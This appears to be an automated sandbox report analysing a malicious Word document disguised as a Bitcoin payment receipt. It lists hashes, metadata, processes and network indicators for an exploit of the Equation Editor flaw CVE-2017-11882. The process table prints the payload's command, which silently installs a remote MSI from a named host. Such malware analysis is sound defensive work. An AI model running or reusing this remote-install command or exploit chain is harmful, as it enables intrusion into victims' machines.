analyze malware
- Huge database of samples and IOCs
- Custom VM setup
- Unlimited submissions
- Interactive approach
| File name: | BTC_payment_receipt.docx |
| Full analysis: | https://app.any.run/tasks/52ccacea-4ba2-4ac7-bb75-bdabce324f10 |
| Verdict: | Malicious activity |
| Analysis date: | May 20, 2019, 09:26:39 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
| File info: | Microsoft Word 2007+ |
| MD5: | 2D49AC3E13B74DF4C3892E6889AB2E21 |
| SHA1: | F1A360822C2828F9165143CA59E1C67837671903 |
| SHA256: | FDEC22B9DE8580661228149F50D3207605372FA0F880C2B45D05F715702B1F7D |
| SSDEEP: | 384:X6ma3W6PYcpf4MS+pG7hvWvRG95OQJJflgI4yFJexEtxI:qmURPYchg5mRG95OQJJfWxTiI |
MALICIOUS
Equation Editor starts application (CVE-2017-11882)
- EQNEDT32.EXE (PID: 3120)
Uses Microsoft Installer as loader
- cmd.exe (PID: 2180)
SUSPICIOUS
Executed via COM
- EQNEDT32.EXE (PID: 3120)
- EQNEDT32.EXE (PID: 1504)
Starts CMD.EXE for commands execution
- EQNEDT32.EXE (PID: 3120)
INFO
Creates files in the user directory
- WINWORD.EXE (PID: 2256)
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 2256)
Application was crashed
- EQNEDT32.EXE (PID: 3120)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .docx | | | Word Microsoft Office Open XML Format document (52.2) |
|---|---|---|
| .zip | | | Open Packaging Conventions container (38.8) |
| .zip | | | ZIP compressed archive (8.8) |
EXIF
ZIP
| ZipRequiredVersion: | 20 |
|---|---|
| ZipBitFlag: | 0x0006 |
| ZipCompression: | Deflated |
| ZipModifyDate: | 1980:01:01 00:00:00 |
| ZipCRC: | 0x2c2fab17 |
| ZipCompressedSize: | 350 |
| ZipUncompressedSize: | 1364 |
| ZipFileName: | [Content_Types].xml |
XML
| Template: | template.dotx |
|---|---|
| TotalEditTime: | - |
| Pages: | 1 |
| Words: | - |
| Characters: | 1 |
| Application: | Microsoft Office Word |
| DocSecurity: | None |
| Lines: | 1 |
| Paragraphs: | 1 |
| ScaleCrop: | No |
| HeadingPairs: |
|
| TitlesOfParts: | - |
| Company: | - |
| LinksUpToDate: | No |
| CharactersWithSpaces: | 1 |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| AppVersion: | 15 |
| Keywords: | - |
| LastModifiedBy: | Richard |
| RevisionNumber: | 2 |
| CreateDate: | 2019:05:16 12:01:00Z |
| ModifyDate: | 2019:05:16 12:01:00Z |
XMP
| Title: | - |
|---|---|
| Subject: | - |
| Creator: | Richard |
| Description: | - |
Total processes
41
Monitored processes
6
Malicious processes
1
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 2256 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\BTC_payment_receipt.docx" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
| 3120 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
| 2180 | cmd.exe & /C CD C: & msiexec.exe /i https://servers.intlde.com/protected.msi /quiet | C:\Windows\system32\cmd.exe | — | EQNEDT32.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1619 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
| 4072 | msiexec.exe /i https://servers.intlde.com/protected.msi /quiet | C:\Windows\system32\msiexec.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 1619 Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
| 3260 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | services.exe | |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
| 1504 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | — | svchost.exe |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
Total events
1 264
Read events
819
Write events
0
Delete events
0
Modification events
Executable files
0
Suspicious files
24
Text files
6
Unknown types
2
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2256 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3ED1.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2256 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{CF523756-FAA8-4670-8B1A-4F27FCB783EB} | — | |
MD5:— | SHA256:— | |||
| 2256 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{0A309029-58EB-468D-937D-79589370E119} | — | |
MD5:— | SHA256:— | |||
| 2256 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{A1722EC5-32C3-45E0-A118-B933F4E3E695}.FSD | binary | |
MD5:6B5E54B8699502A5916D15A2452BADDB | SHA256:DA275C3D92D7E8605FA1247788559DD3FFAE76C0053D109897A24466D46B9F0F | |||
| 2256 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$C_payment_receipt.docx | pgc | |
MD5:6CB648823F80F0B0A5E0DAC7189399EE | SHA256:5241529AF1BB6E6DCA98F59F250144D8BCBB9FF179A618A2FF2C8BFD1FEB961F | |||
| 2256 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD | binary | |
MD5:80E54B9ADE68235A249F98374002FF7F | SHA256:BFF98ABD394ED0541E86A9D55DC918F186F70F31B370DC25384979C3DFD06BA6 | |||
| 2256 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\protected[1].doc | text | |
MD5:C5B5C57A2CC8AE78D2D83B6CC0003154 | SHA256:743B5C1132BFB088BD5693AB6D38B2CE05F89AA78975EA2AF5DAF61FC06618BC | |||
| 2256 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD | binary | |
MD5:E1EF38F6BF643FCB78F704E01E7F559C | SHA256:CEDE53A7F21FDB9FAC6A816D6CE7D7B3A348FEABE9BBEB387801A56AF4DDEEA8 | |||
| 2256 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:6C804EF70B2046E40892D58E7EB955C9 | SHA256:291E400DB36FF2DC6C90A0EFB7FDB9847FFC2366725BDAA750B4E902E9FB4DCB | |||
| 2256 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:B19FF5CEFD1DA5D0F2805A945B570C3C | SHA256:F75A592B67565D406D9D7F15EC8C276CD6D0D5E54AD5EF87413F565E44175FC9 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
6
DNS requests
3
Threats
0
HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2256 | WINWORD.EXE | 198.252.108.62:443 | servers.intlde.com | Hawk Host Inc. | CA | unknown |
3260 | msiexec.exe | 198.252.108.62:443 | servers.intlde.com | Hawk Host Inc. | CA | unknown |
984 | svchost.exe | 198.252.108.62:443 | servers.intlde.com | Hawk Host Inc. | CA | unknown |
DNS requests
Domain | IP | Reputation |
|---|---|---|
servers.intlde.com |
| unknown |
dns.msftncsi.com |
| shared |